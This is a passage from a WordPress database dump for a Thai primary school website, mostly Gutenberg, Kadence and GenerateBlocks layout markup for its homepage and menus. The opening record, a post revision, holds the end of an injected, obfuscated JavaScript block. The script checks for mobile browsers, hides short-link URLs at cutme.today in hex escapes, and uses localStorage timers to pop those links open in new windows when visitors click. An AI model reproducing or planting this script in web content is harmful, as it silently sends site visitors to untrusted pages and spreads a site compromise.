|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วิดีโอกิจกรรมโรงเรียน','','inherit','closed','closed','','275-revision-v1','','','2024-07-31 10:33:09','2024-07-31 03:33:09','',275,'http://pakhaeng.ssk.in.th/?p=302',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(304,1,'2024-07-31 10:44:22','2024-07-31 03:44:22','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 